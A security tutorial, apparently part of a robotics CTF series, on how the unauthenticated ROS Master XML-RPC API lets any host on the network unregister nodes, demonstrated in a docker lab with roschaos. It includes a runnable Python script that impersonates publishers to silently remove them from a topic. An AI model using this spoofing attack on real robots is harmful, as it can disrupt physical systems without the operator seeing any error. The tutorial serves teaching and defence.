\newpage
In this tutorial we'll review how the ROS Master API provides no authentication whatsoever for registering and unregistering publishers, subscribers and services. This leads to a reported vulnerability (aliasrobotics/RVD#87) that can easily be exploited with off-the-shelf penetration testing tools by an attacker with access to the internal robot network: any host that can reach the master's XML-RPC port can claim to be any node and remove any registration.
This work is heavily based on [1], [3] and [4].
Note: as in previous tutorials, there's a docker container that facilitates reproducing the work of this tutorial. The container can be built with:

```bash
docker build -t basic_cybersecurity11:latest .
```

and run with:

```bash
docker run -it basic_cybersecurity11:latest
```
Let's start by listing the ROS Nodes and Topics participating in the network. After launching the container:

```bash
root@d64845e9601e:/# rosrun scenario1 talker &
root@d64845e9601e:/# rosrun scenario1 listener
```
Now, let's get a second command line into the simulated robotic scenario running over docker. To do so:

```bash
| => docker ps
CONTAINER ID        IMAGE                          COMMAND                  CREATED             STATUS              PORTS               NAMES
935c390c1e49        basic_cybersecurity11:latest   "/root/launch_script…"   20 seconds ago      Up 19 seconds                           vibrant_chandrasekhar
| => docker exec -it 935c390c1e49 /bin/bash
root@935c390c1e49:/#
```
On the second terminal of the same docker instance:

```bash
root@d64845e9601e:/# rosnode list
/listener
/publisher
/rosout
root@d64845e9601e:/# rostopic list
/flag
/rosout
/rosout_agg
```
We can see that there are several Nodes; we're mainly interested in `/publisher` and `/listener`, which exchange information through the `/flag` Topic as follows:

```bash
root@d64845e9601e:/# rostopic echo /flag
data: "br{N(*-E6NgwbyWc"
---
data: "br{N(*-E6NgwbyWc"
---
data: "br{N(*-E6NgwbyWc"
---
...
```
Let's now use roschaos [5] from the second terminal to unregister `/publisher` from the ROS Master. roschaos simply calls the Master API on behalf of the target node; nothing in that API asks the caller to prove it actually is that node:

```bash
root@655447dc534c:/# rosnode list
/listener
/publisher
/rosout
root@655447dc534c:/# roschaos master unregister node --node_name /publisher
Unregistering /publisher
```
You will see that the listener stops getting messages: once the registration is gone, the master notifies the subscribers of `/flag` that the topic has no publishers left and `/listener` drops its connection to `/publisher`. If we now verify it:

```bash
root@655447dc534c:/# rosnode list
/listener
/rosout
```

We observe that the ROS Master does not find `/publisher` anymore: it's been unregistered.
Furthermore, the `talker` process is still running. Unregistering only edits the master's bookkeeping; the node itself is never notified and keeps running as if nothing had happened, so neither the node nor its operator sees any error:

```bash
root@655447dc534c:/# ps -e
  PID TTY          TIME CMD
    1 pts/0    00:00:00 launch_script.b
   31 pts/0    00:00:00 roscore
   42 ?        00:00:01 rosmaster
   55 ?        00:00:01 rosout
   72 pts/0    00:00:00 bash
   78 pts/1    00:00:00 bash
   90 pts/0    00:00:00 talker
  108 pts/0    00:00:01 listener
  174 pts/1    00:00:00 ps
```
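The Master API call behind the step above, as an added example that is not part of the original tutorial nor of roschaos or ROSPenTo. The Master API is plain XML-RPC: every method carries a `caller_id` string that the master takes at face value, and `unregisterPublisher` only checks that the `(caller_id, caller_api)` pair it is handed is currently registered for the topic. Both values are obtainable from the same unauthenticated API (`getSystemState`, `lookupNode`), so the attacker can impersonate the victim node. To keep the script runnable offline it includes a constructed stand-in master (`FakeMaster`, an assumption that mimics only the bookkeeping the attack touches); `attack()` works unchanged against a real master URI such as the container's `ROS_MASTER_URI` (assumed to be the default `http://localhost:11311`). The node URI `http://robot:45678` is made up for the demo.

```python
import threading
from xmlrpc.client import ServerProxy
from xmlrpc.server import SimpleXMLRPCServer

SUCCESS = 1  # status code used by the ROS Master API


class FakeMaster:
    """Constructed stand-in for rosmaster (only the calls the attack needs).

    Like the real master it keeps (caller_id, caller_api) pairs per topic and
    removes one whenever unregisterPublisher names an existing pair; nothing
    ties the caller to the node it claims to be.
    """

    def __init__(self):
        self.publishers = {}  # topic -> [(node_name, node_xmlrpc_uri), ...]

    def registerPublisher(self, caller_id, topic, topic_type, caller_api):
        self.publishers.setdefault(topic, []).append((caller_id, caller_api))
        return (SUCCESS, "Registered [%s] as publisher of [%s]" % (caller_id, topic), [])

    def unregisterPublisher(self, caller_id, topic, caller_api):
        providers = self.publishers.get(topic, [])
        if (caller_id, caller_api) not in providers:
            # Same as rosmaster: not an error, the intended state is reached.
            return (SUCCESS, "[%s] is not a publisher of [%s]" % (caller_id, topic), 0)
        providers.remove((caller_id, caller_api))
        # The real master now sends publisherUpdate to every subscriber of the
        # topic, which is why /listener in the tutorial goes silent.
        return (SUCCESS, "Unregistered [%s] as publisher of [%s]" % (caller_id, topic), 1)

    def getSystemState(self, caller_id):
        pubs = [[topic, [name for name, _ in nodes]]
                for topic, nodes in self.publishers.items()]
        return (SUCCESS, "current system state", [pubs, [], []])

    def lookupNode(self, caller_id, node_name):
        for nodes in self.publishers.values():
            for name, uri in nodes:
                if name == node_name:
                    return (SUCCESS, "node api", uri)
        return (0, "unknown node [%s]" % node_name, "")


def start_fake_master():
    """Serve a FakeMaster on a random localhost port; returns (uri, instance)."""
    master = FakeMaster()
    server = SimpleXMLRPCServer(("127.0.0.1", 0), logRequests=False)
    server.register_instance(master)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return "http://127.0.0.1:%d" % server.server_address[1], master


def attack(master_uri, topic, attacker_id="/attacker"):
    """Unregister every publisher of `topic`, impersonating each of them.

    Returns [(node_name, node_uri, num_unregistered), ...] as reported by the
    master.  No credential is needed at any step.
    """
    master = ServerProxy(master_uri)
    code, msg, state = master.getSystemState(attacker_id)
    if code != SUCCESS:
        raise RuntimeError("getSystemState failed: %s" % msg)
    publishers = state[0]  # [[topic, [node, ...]], ...]
    victims = [node for t, nodes in publishers if t == topic for node in nodes]
    results = []
    for node in victims:
        code, msg, uri = master.lookupNode(attacker_id, node)
        if code != SUCCESS:
            raise RuntimeError("lookupNode failed: %s" % msg)
        # The spoof: caller_id is the victim's name and caller_api its URI,
        # both just handed to us by the master itself.
        code, msg, count = master.unregisterPublisher(node, topic, uri)
        results.append((node, uri, count))
    return results


if __name__ == "__main__":
    uri, fake = start_fake_master()
    # Constructed victim mirroring the tutorial: /publisher on /flag.
    fake.registerPublisher("/publisher", "/flag", "std_msgs/String", "http://robot:45678")
    print(attack(uri, "/flag"))      # [('/publisher', 'http://robot:45678', 1)]
    print(fake.publishers["/flag"])  # []
```

Against a real master the three calls are exactly what `rosnode`, `rostopic` and roschaos issue, which is why the tutorial's attack needs nothing beyond network reachability; a master that wanted to refuse this would have to authenticate the XML-RPC caller rather than trust `caller_id`.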
- [1] Mendia, G. O., Juan, L. U. S., Bascaran, X. P., Calvo, A. B., Cordero, A. H., Ugarte, I. Z., ... & Vilches, V. M. (2018). Robotics CTF (RCTF), a playground for robot hacking. arXiv preprint arXiv:1810.02690.
- [2] Scenarios of the Robotics CTF (RCTF), a playground to challenge robot security. Retrieved from https://github.com/aliasrobotics/RCTF
- [3] Dieber, B., Breiling, B., Taurer, S., Kacianka, S., Rass, S., & Schartner, P. (2017). Security for the Robot Operating System. Robotics and Autonomous Systems, 98, 192-203.
- [4] SROS2 Tutorial, IROS 2018. Retrieved from https://ruffsl.github.io/IROS2018_SROS2_Tutorial/.
- [5] roschaos. Retrieved from https://github.com/ruffsl/roschaos.
- [6] ROSPenTo. Retrieved from https://github.com/jr-robotics/ROSPenTo.